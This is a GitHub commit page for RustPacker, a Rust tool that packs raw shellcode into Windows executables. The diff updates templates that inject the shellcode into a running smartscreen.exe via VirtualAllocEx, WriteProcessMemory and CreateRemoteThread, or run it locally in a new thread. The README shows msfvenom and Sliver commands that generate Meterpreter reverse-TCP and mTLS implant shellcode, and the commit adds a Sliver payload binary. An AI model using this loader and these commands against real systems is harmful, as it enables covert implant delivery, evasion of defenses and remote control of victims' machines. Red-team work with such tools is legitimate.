Skip to content

Commit 3782e1d

Browse files
NariodNariod
authored
Merge pull request #2 from Nariod/dev
Dev
2 parents 567411f + 86de5ba commit 3782e1d

File tree

7 files changed

+48
-21
lines changed

7 files changed

+48
-21
lines changed

Cargo.toml

Lines changed: 2 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -10,4 +10,5 @@ clap = "3.2.22"
1010
random-string = "1.0.0"
1111
cargo = "0.65.0"
1212
path-absolutize = "3.0.13"
13-
fs_extra = "1.2.0"
13+
fs_extra = "1.2.0"
14+
path-clean = "0.1.0"

README.md

Lines changed: 6 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -50,13 +50,18 @@ RustPacker is compatible with any "raw" shellcode.
5050
You can generate raw MSF shellcode using msfvenom's raw format. Ex:
5151
- `msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=127.0.0.1 LPORT=80 -f raw -o msf.bin`
5252

53+
### Sliver
54+
You can generate raw [Sliver](https://github.com/BishopFox/sliver) shellcode using Sliver's "--format shellcode". Ex:
55+
- `generate --mtls 127.0.0.1:443 --format shellcode --windows`
56+
- Do not use Shikata Ga Nai (SGN) Sliver encoder if prompted. RustPacker templates do not use RWX memory regions, which are required for SGN to work.
57+
5358
## Todo
5459
- [X] Port createThread Rust template
5560
- [X] Port createRemoteThread Rust template
5661
- [X] Debug binary file to Vec<u8>
5762
- [X] Debug compiler -> Done, FFS !
5863
- [X] Packer POC
59-
- [ ] Migrate to "std::include_bytes"
64+
- [X] Migrate to "std::include_bytes"
6065
- [ ] Add encryption / encoding
6166
- [X] Build dockerfile
6267
- [X] Strip output binaries

shared/sliver.bin

15 MB
Binary file not shown.

src/main.rs

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -7,7 +7,7 @@ mod shellcode_reader;
77

88
fn main() {
99
let order = arg_parser::meta_arg_parser();
10-
let shellcode = shellcode_reader::meta_shellcode_reader(&order.shellcode_path);
11-
let mut output_folder = puzzle::meta_puzzle(order, shellcode);
10+
//let shellcode = shellcode_reader::meta_shellcode_reader(&order.shellcode_path);
11+
let mut output_folder = puzzle::meta_puzzle(order);
1212
compiler::meta_compiler(&mut output_folder);
1313
}

src/puzzle.rs

Lines changed: 23 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -7,6 +7,22 @@ use std::io::prelude::*;
77
use std::path::Path;
88
use std::path::PathBuf;
99
use std::str;
10+
use std::env;
11+
use std::io;
12+
use path_clean::PathClean;
13+
14+
pub fn absolute_path(path: impl AsRef<Path>) -> io::Result<PathBuf> {
15+
// thanks to https://stackoverflow.com/questions/30511331/getting-the-absolute-path-from-a-pathbuf
16+
let path = path.as_ref();
17+
18+
let absolute_path = if path.is_absolute() {
19+
path.to_path_buf()
20+
} else {
21+
env::current_dir()?.join(path)
22+
}.clean();
23+
24+
Ok(absolute_path)
25+
}
1026

1127
fn search_and_replace(
1228
path_to_main: &Path,
@@ -51,7 +67,7 @@ fn copy_template(source: &Path, dest: &Path) -> Result<(), Box<dyn std::error::E
5167
Ok(())
5268
}
5369

54-
pub fn meta_puzzle(order: Order, shellcode: Vec<u8>) -> PathBuf {
70+
pub fn meta_puzzle(order: Order) -> PathBuf {
5571
println!("[+] Assembling Rust code..");
5672
let mut general_output_folder = PathBuf::new();
5773
general_output_folder.push("shared");
@@ -60,8 +76,12 @@ pub fn meta_puzzle(order: Order, shellcode: Vec<u8>) -> PathBuf {
6076
Execution::CreateThread => Path::new("templates/createThread/."),
6177
Execution::CreateRemoteThread => Path::new("templates/createRemoteThread/."),
6278
};
63-
let search = "{{shellcode}}";
64-
let replace: String = format!("{:?}", &shellcode);
79+
let search = "{{PATH_TO_SHELLCODE}}";
80+
let absolute_shellcode_path = match absolute_path(order.shellcode_path) {
81+
Ok(path) => path,
82+
Err(err) => panic!("{:?}", err),
83+
};
84+
let replace: String = format!("{:?}", &absolute_shellcode_path);
6585

6686
let folder: PathBuf = match create_root_folder(&general_output_folder) {
6787
Ok(content) => content,

templates/createRemoteThread/src/main.rs

Lines changed: 12 additions & 11 deletions
Original file line numberDiff line numberDiff line change
@@ -6,6 +6,7 @@ use windows::Win32::System::Memory::{MEM_COMMIT, PAGE_EXECUTE_READ, PAGE_READWRI
66
use windows::Win32::System::Threading::CreateRemoteThread;
77
use windows::Win32::System::Threading::OpenProcess;
88
use windows::Win32::System::Threading::PROCESS_ALL_ACCESS;
9+
use std::include_bytes;
910

1011
fn boxboxbox(tar: &str) -> Vec<u32> {
1112
// search for processes to inject into
@@ -22,29 +23,29 @@ fn enhance(buf: &[u8], tar: &u32) {
2223
// injecting in target processes :)
2324

2425
unsafe {
25-
let hProcess = OpenProcess(PROCESS_ALL_ACCESS, false, *tar).unwrap();
26-
let resultPtr = VirtualAllocEx(hProcess, None, buf.len(), MEM_COMMIT, PAGE_READWRITE);
26+
let h_process = OpenProcess(PROCESS_ALL_ACCESS, false, *tar).unwrap();
27+
let result_ptr = VirtualAllocEx(h_process, None, buf.len(), MEM_COMMIT, PAGE_READWRITE);
2728
let mut byteswritten = 0;
2829
let _resb = WriteProcessMemory(
29-
hProcess,
30-
resultPtr,
30+
h_process,
31+
result_ptr,
3132
buf.as_ptr() as _,
3233
buf.len(),
3334
Some(&mut byteswritten),
3435
);
3536
let mut old_perms = PAGE_EXECUTE_READ;
3637
let _bool = VirtualProtectEx(
37-
hProcess,
38-
resultPtr,
38+
h_process,
39+
result_ptr,
3940
buf.len(),
4041
PAGE_EXECUTE_READ,
4142
&mut old_perms,
4243
);
43-
let _resCRT = CreateRemoteThread(
44-
hProcess,
44+
let _res_crt = CreateRemoteThread(
45+
h_process,
4546
None,
4647
0,
47-
Some(std::mem::transmute(resultPtr)),
48+
Some(std::mem::transmute(result_ptr)),
4849
None,
4950
0,
5051
None,
@@ -57,13 +58,13 @@ fn main() {
5758
// inject in the following processes:
5859
let tar: &str = "smartscreen.exe";
5960

60-
let buf: Vec<u8> = vec!{{shellcode}};
61+
let buf = include_bytes!({{PATH_TO_SHELLCODE}});
6162
let list: Vec<u32> = boxboxbox(tar);
6263
if list.len() == 0 {
6364
panic!("[-] Unable to find a process.")
6465
} else {
6566
for i in &list {
66-
enhance(&buf, i);
67+
enhance(buf, i);
6768
}
6869
}
6970
}

templates/createThread/src/main.rs

Lines changed: 3 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -5,7 +5,7 @@ use windows::Win32::System::Memory::{MEM_COMMIT, PAGE_EXECUTE_READ, PAGE_READWRI
55
use windows::Win32::System::Threading::CreateThread;
66
use windows::Win32::System::Threading::WaitForSingleObject;
77
use windows::Win32::System::Threading::THREAD_CREATION_FLAGS;
8-
8+
use std::include_bytes;
99

1010

1111
fn enhance(buf: &[u8]) {
@@ -28,6 +28,6 @@ fn enhance(buf: &[u8]) {
2828
}
2929
}
3030
fn main() {
31-
let buf: Vec<u8> = vec!{{shellcode}};
32-
enhance(&buf);
31+
let buf = include_bytes!({{PATH_TO_SHELLCODE}});
32+
enhance(buf);
3333
}

0 commit comments

Comments
 (0)